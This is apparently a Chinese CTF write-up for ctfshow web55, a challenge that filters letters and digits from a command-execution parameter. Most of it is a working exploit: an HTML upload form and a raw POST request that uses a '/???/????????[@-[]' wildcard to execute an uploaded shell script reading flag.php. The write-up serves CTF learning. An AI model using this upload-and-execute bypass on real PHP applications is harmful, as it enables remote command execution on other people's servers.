过滤所有字母数字的命令执行
题目:ctfshow web55
生成Post请求的网页源码
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Post文件</title>
</head>
<body>
<form action="http://85eb92dd-324f-4c12-903e-22077c4c6f71.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
最终payload:
POST /?c=.+/???/????????[@-[] HTTP/1.1
Host: 85eb92dd-324f-4c12-903e-22077c4c6f71.challenge.ctf.show
Content-Length: 301
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNoPBaLZ9PrbRojyI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryNoPBaLZ9PrbRojyI
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain
#!/bin/sh
cat flag.php
------WebKitFormBoundaryNoPBaLZ9PrbRojyI
Content-Disposition: form-data; name="submit"
鎻愪氦
------WebKitFormBoundaryNoPBaLZ9PrbRojyI--
疑问
为什么get方法接收的参数,我们却用post方法提交也可以达到相同结果。
是不是由于上传的临时文件会在操作后被删除,因此才把post请求带上参数,在传文件的同时执行代码呢?